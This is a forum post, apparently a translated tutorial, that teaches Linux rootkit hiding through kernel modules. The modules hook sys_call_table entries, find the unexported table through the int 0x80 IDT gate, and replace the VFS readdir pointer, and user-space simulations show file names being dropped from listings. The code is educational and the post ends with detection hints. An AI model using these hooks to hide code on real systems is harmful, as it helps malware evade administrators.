If a trojan is to stay hidden from the system administrator, intercepting system calls is almost unavoidable. In most cases the hijack is done by overwriting entries in the system call table.
Below is a typical module that intercepts a system call this way:
Module one:
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/unistd.h>   /* __NR_mkdir */
MODULE_LICENSE("GPL");
extern void *sys_call_table[]; /* relies on the kernel exporting sys_call_table;
                                  on kernels that do not, the module fails to load */
asmlinkage int (*orig_mkdir)(const char *path, int mode); /* the original system call */
asmlinkage int hacked_mkdir(const char *path, int mode)
{
    return 0; /* reports success, but the new system call does nothing */
}
int init_module(void) /* module setup */
{
    orig_mkdir = sys_call_table[__NR_mkdir];
    sys_call_table[__NR_mkdir] = hacked_mkdir;
    return 0;
}
void cleanup_module(void) /* module shutdown */
{
    sys_call_table[__NR_mkdir] = orig_mkdir; /* restore the original mkdir */
}
This approach has one precondition: the kernel must export the sys_call_table symbol. In 2.6 kernels, and in some 2.4-based systems (for example Red Hat AS 3), sys_call_table is no longer exported, so a module can no longer obtain the table's address with a plain extern void *sys_call_table[];.
Fortunately, even when the kernel does not export sys_call_table, its address can still be found in memory. (Knowing the address is not always enough: later x86 kernels keep the table in read-only memory, so the store in init would fault unless write protection is lifted first.) Here is one way to locate it:
Module two (tested on 2.4 and 2.6 kernels):
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/sched.h>    /* current */
#include <linux/unistd.h>   /* __NR_mkdir */
#include <linux/errno.h>
MODULE_LICENSE("GPL");
MODULE_AUTHOR("xunil@bmy");
MODULE_DESCRIPTION("Different from others, this module automatically locates the entry of sys_call_table!");
unsigned long *sys_call_table = NULL;
asmlinkage int (*orig_mkdir)(const char *, int);
/* i386 IDT gate descriptor, 8 bytes per vector */
struct _idt
{
    unsigned short offset_low, segment_sel;
    unsigned char reserved, flags;
    unsigned short offset_high;
};
/* Locate sys_call_table: IDT -> gate for int 0x80 -> system_call ->
 * the "call *sys_call_table(,%eax,4)" instruction (ff 14 85 <addr>). i386 only. */
unsigned long *getscTable(void)
{
    unsigned char idtr[6];
    unsigned char *shell;
    static const unsigned char sort[3] = { 0xff, 0x14, 0x85 };
    struct _idt *idt;
    unsigned long system_call, sct;
    int i;
    /* get the interrupt descriptor table base (bytes 2..5 of the sidt result) */
    __asm__("sidt %0" : "=m" (idtr));
    /* get the address of system_call from the gate for vector 0x80 */
    idt = (struct _idt *)(*(unsigned long *)&idtr[2] + 8 * 0x80);
    system_call = ((unsigned long)idt->offset_high << 16) | idt->offset_low;
    shell = (unsigned char *)system_call;
    /* scan the first 100 bytes of system_call for the dispatch instruction */
    for (i = 0; i < (100 - 2); i++)
        if (shell[i] == sort[0] && shell[i + 1] == sort[1] && shell[i + 2] == sort[2])
            break;
    if (i >= (100 - 2))
        return NULL; /* pattern not found: do not read a garbage address */
    /* the four bytes after the opcode are the address of sys_call_table */
    sct = *(unsigned long *)&shell[i + 3];
    return (unsigned long *)sct;
}
asmlinkage int hacked_mkdir(const char *pathname, int mode)
{
    printk("PID %d called sys_mkdir!\n", current->pid);
    return orig_mkdir(pathname, mode);
}
static int __init find_init(void)
{
    sys_call_table = getscTable();
    if (!sys_call_table) {
        printk("sys_call_table not found\n");
        return -ENODEV;
    }
    orig_mkdir = (int (*)(const char *, int))sys_call_table[__NR_mkdir];
    sys_call_table[__NR_mkdir] = (unsigned long)hacked_mkdir;
    return 0;
}
static void __exit find_cleanup(void)
{
    sys_call_table[__NR_mkdir] = (unsigned long)orig_mkdir;
}
module_init(find_init);
module_exit(find_cleanup);
getscTable() is the function that locates sys_call_table in memory.
On i386, every system call enters the kernel through the int 0x80 interrupt. The interrupt descriptor table (IDT) maps each interrupt vector to its service routine; for vector 0x80 that routine is system_call, which indexes the system call table with the syscall number in eax and calls the matching service routine. The idtr register holds the base address of the IDT, and __asm__("sidt %0" : "=m" (idtr)); stores it in memory. From that base, the gate descriptor for int 0x80 sits at base + 8*0x80, and joining its offset_high and offset_low fields gives the address of system_call. Disassembling system_call shows that it dispatches with call *sys_call_table(,%eax,4), which assembles to the bytes ff 14 85 followed by the 32-bit address of the table. So scanning the first bytes of system_call for ff 14 85 and reading the four bytes that follow yields the entry address of the system call table.
Two caveats: this is i386-specific (x86-64 enters the kernel via the syscall instruction and MSR_LSTAR, and its table uses 8-byte entries, so neither the IDT walk nor the opcode pattern applies), and the scan must be bounded and checked for a miss, because a false match turns a random address into a function pointer the module will later write through.
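The following is an added, user-space illustration of the lookup just described; it is not part of the original module. It decodes the int 0x80 gate from a constructed IDT image and scans constructed system_call bytes for ff 14 85, exactly as getscTable() does in kernel space, but on data it builds itself, so it runs anywhere. The addresses 0xc0106a00 and 0xc02fb000, the selector 0x10 and the prologue bytes are all assumptions chosen for the demonstration, and the not-found case returns 0 instead of dereferencing garbage.

```c
#include <stdint.h>
#include <stddef.h>
#include <string.h>
#include <stdio.h>

/* 32-bit x86 IDT gate descriptor, the same layout as struct _idt in module two. */
struct idt_gate {
    uint16_t offset_low;
    uint16_t segment_sel;
    uint8_t  reserved;
    uint8_t  flags;
    uint16_t offset_high;
} __attribute__((packed));

/* Read the handler address out of the gate for vector vec in an IDT image. */
uint32_t idt_handler_addr(const uint8_t *idt_base, unsigned vec)
{
    struct idt_gate g;
    memcpy(&g, idt_base + 8u * vec, sizeof g);
    return ((uint32_t)g.offset_high << 16) | g.offset_low;
}

/* Scan at most len bytes of code for "call *disp32(,%eax,4)", encoded as
 * ff 14 85 followed by a little-endian disp32, and return that disp32 (the
 * sys_call_table address). Returns 0 when the pattern is absent or truncated. */
uint32_t find_syscall_table(const uint8_t *code, size_t len)
{
    static const uint8_t pat[3] = { 0xff, 0x14, 0x85 };
    size_t i;
    for (i = 0; i + 7 <= len; i++) {          /* 3 opcode bytes + 4 address bytes */
        if (memcmp(code + i, pat, 3) == 0) {
            uint32_t disp;
            memcpy(&disp, code + i + 3, 4);
            return disp;
        }
    }
    return 0;
}

#define SYSCALL_VEC      0x80
#define FAKE_SYSTEM_CALL 0xc0106a00u   /* assumed address of system_call */
#define FAKE_TABLE       0xc02fb000u   /* assumed address of sys_call_table */

/* Constructed sample data, not taken from a real kernel: an IDT image with
 * only vector 0x80 populated, and a few illustrative bytes of system_call
 * ending in the dispatch instruction. */
static uint8_t sample_idt[8 * (SYSCALL_VEC + 1)];
static const uint8_t sample_system_call[] = {
    0x50,                                     /* push %eax */
    0xfc,                                     /* cld */
    0x06, 0x1e,                               /* push %es; push %ds */
    0x3d, 0x3d, 0x01, 0x00, 0x00,             /* cmp $0x13d,%eax */
    0x73, 0x07,                               /* jae badsys */
    0xff, 0x14, 0x85, 0x00, 0xb0, 0x2f, 0xc0, /* call *0xc02fb000(,%eax,4) */
    0x89, 0x44, 0x24, 0x18,                   /* mov %eax,0x18(%esp) */
};

/* Run the whole lookup that module two performs in kernel space. */
uint32_t demo_locate_table(void)
{
    struct idt_gate g;
    uint32_t handler;
    memset(&g, 0, sizeof g);
    g.offset_low  = (uint16_t)(FAKE_SYSTEM_CALL & 0xffff);
    g.offset_high = (uint16_t)(FAKE_SYSTEM_CALL >> 16);
    g.segment_sel = 0x10;   /* assumed kernel code selector */
    g.flags       = 0xee;   /* present, DPL 3, 32-bit trap gate */
    memcpy(sample_idt + 8 * SYSCALL_VEC, &g, sizeof g);

    handler = idt_handler_addr(sample_idt, SYSCALL_VEC);
    if (handler != FAKE_SYSTEM_CALL)
        return 0;
    /* In the kernel, handler would now be read as code; here the constructed
     * bytes stand in for the body of system_call. */
    return find_syscall_table(sample_system_call, sizeof sample_system_call);
}

int main(void)
{
    printf("sys_call_table = 0x%08x\n", demo_locate_table());
    return 0;
}
```

The bound in find_syscall_table (i + 7 <= len) is the check the kernel module also needs: a 100-byte window that stops before the pattern, or a pattern sitting in the last six bytes, must yield "not found" rather than a partial address.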
For intercepting file-system-related system calls, the Adore-ng rootkit introduced a different method. In short, it hooks the function pointer table that the VFS uses for a file system (the file_operations structure) instead of touching the system call table at all.
Here is how that works:
Module three (tested on 2.4 and 2.6 kernels):
#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/init.h>
#include <linux/fs.h>      /* struct file, file_operations, filldir_t, filp_open */
#include <linux/err.h>     /* IS_ERR, PTR_ERR */
#include <linux/fcntl.h>   /* O_RDONLY */
MODULE_AUTHOR("xunil@BMY");
MODULE_DESCRIPTION("By utilizing the VFS filesystem, this module can capture system calls.");
MODULE_LICENSE("GPL");
static const char *root_fs = "/";
typedef int (*readdir_t)(struct file *, void *, filldir_t);
static readdir_t orig_root_readdir = NULL;
/* Replacement readdir: log, then defer to the original. A rootkit would
 * wrap filldir here and drop the entries it wants hidden. */
static int myreaddir(struct file *fp, void *buf, filldir_t filldir)
{
    int r;
    printk("<1>You got me partner!\n");
    r = orig_root_readdir(fp, buf, filldir);
    return r;
}
/* Open p and swap the readdir pointer in its file_operations. That structure
 * is shared by every directory of the same file-system type, so the hook
 * applies far beyond p itself. f_op is const on 2.6, hence the cast. */
static int patch_vfs(const char *p, readdir_t *orig_readdir, readdir_t new_readdir)
{
    struct file *filep;
    struct file_operations *fops;
    filep = filp_open(p, O_RDONLY, 0);
    if (IS_ERR(filep))
        return PTR_ERR(filep);
    fops = (struct file_operations *)filep->f_op;
    if (orig_readdir)
        *orig_readdir = fops->readdir;
    fops->readdir = new_readdir;
    filp_close(filep, 0);
    return 0;
}
static int unpatch_vfs(const char *p, readdir_t orig_readdir)
{
    struct file *filep;
    struct file_operations *fops;
    filep = filp_open(p, O_RDONLY, 0);
    if (IS_ERR(filep))
        return PTR_ERR(filep);
    fops = (struct file_operations *)filep->f_op;
    fops->readdir = orig_readdir;
    filp_close(filep, 0);
    return 0;
}
static int __init patch_init(void)
{
    int r = patch_vfs(root_fs, &orig_root_readdir, myreaddir);
    if (r)
        return r; /* refuse to load if the hook could not be installed */
    printk("<1>VFS is patched!\n");
    return 0;
}
static void __exit patch_cleanup(void)
{
    unpatch_vfs(root_fs, orig_root_readdir);
    printk("<1>VFS is unpatched!\n");
}
module_init(patch_init);
module_exit(patch_cleanup);
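Module three only logs; what makes the readdir hook useful to a rootkit is the second half of the trick, which the page describes but does not show: the replacement readdir hands the file system a wrapped filldir callback that silently skips the entries to be hidden. The block below is an added user-space simulation of that mechanism, not code from the page or from Adore-ng. It assumes simplified filldir_t and readdir_t signatures (the kernel's carry offset, inode and type arguments as well), a constructed directory listing in place of the real file system, and the prefix _h4x as the marker for hidden names.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* User-space stand-ins for the kernel types. Assumption: the real filldir_t
 * takes more arguments (offset, inode, type); only name and length matter here. */
typedef int (*filldir_t)(void *buf, const char *name, int namelen);
typedef int (*readdir_t)(void *buf, filldir_t filldir);

/* Names beginning with this prefix are hidden from every directory listing. */
static const char *hidden_prefix = "_h4x";

/* State the hooked readdir threads through to its replacement callback. */
struct hide_ctx {
    void     *orig_buf;      /* the caller's real buffer */
    filldir_t orig_filldir;  /* the caller's real callback */
};

/* Replacement filldir: swallow hidden names, forward everything else. */
static int hide_filldir(void *buf, const char *name, int namelen)
{
    struct hide_ctx *ctx = buf;
    size_t plen = strlen(hidden_prefix);
    if ((size_t)namelen >= plen && memcmp(name, hidden_prefix, plen) == 0)
        return 0; /* 0 means "continue": the entry silently disappears */
    return ctx->orig_filldir(ctx->orig_buf, name, namelen);
}

/* Stand-in for the file system's original readdir: a constructed listing. */
static const char *const sample_listing[] = { ".", "..", "bin", "_h4x", "etc", "_h4x.log" };

static int orig_readdir(void *buf, filldir_t filldir)
{
    size_t i;
    for (i = 0; i < sizeof sample_listing / sizeof sample_listing[0]; i++)
        if (filldir(buf, sample_listing[i], (int)strlen(sample_listing[i])) != 0)
            return -1;
    return 0;
}

/* What myreaddir becomes in a rootkit: wrap the caller's buffer and callback,
 * then let the original readdir walk the directory through the wrapper. */
static int hooked_readdir(void *buf, filldir_t filldir)
{
    struct hide_ctx ctx = { buf, filldir };
    return orig_readdir(&ctx, hide_filldir);
}

/* The "caller" (think ls via getdents): collects names into a text buffer. */
struct collector { char out[256]; };

static int collect(void *buf, const char *name, int namelen)
{
    struct collector *c = buf;
    size_t used = strlen(c->out);
    if (used + (size_t)namelen + 2 > sizeof c->out)
        return -1;
    memcpy(c->out + used, name, (size_t)namelen);
    c->out[used + (size_t)namelen] = ' ';
    c->out[used + (size_t)namelen + 1] = '\0';
    return 0;
}

/* Produce the space-separated listing as seen through rd (hooked or not). */
const char *listing_via(readdir_t rd)
{
    static struct collector c;
    c.out[0] = '\0';
    rd(&c, collect);
    return c.out;
}

int main(void)
{
    printf("real:   %s\n", listing_via(orig_readdir));
    printf("hooked: %s\n", listing_via(hooked_readdir));
    return 0;
}
```

Because the hook sits below the system call layer, a detection tool that compares sys_call_table against a known-good copy sees nothing wrong; what still gives it away is the file_operations pointer of the directory inode no longer pointing into the file system's own code (or, for a module like the one above, into an address range that belongs to a loaded module rather than the kernel text).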
spy1985 posted on 2007-04-09 21:42:30:
Nicely written~~
何哥 posted on 2005-11-15 01:11:39:
Thanks for sharing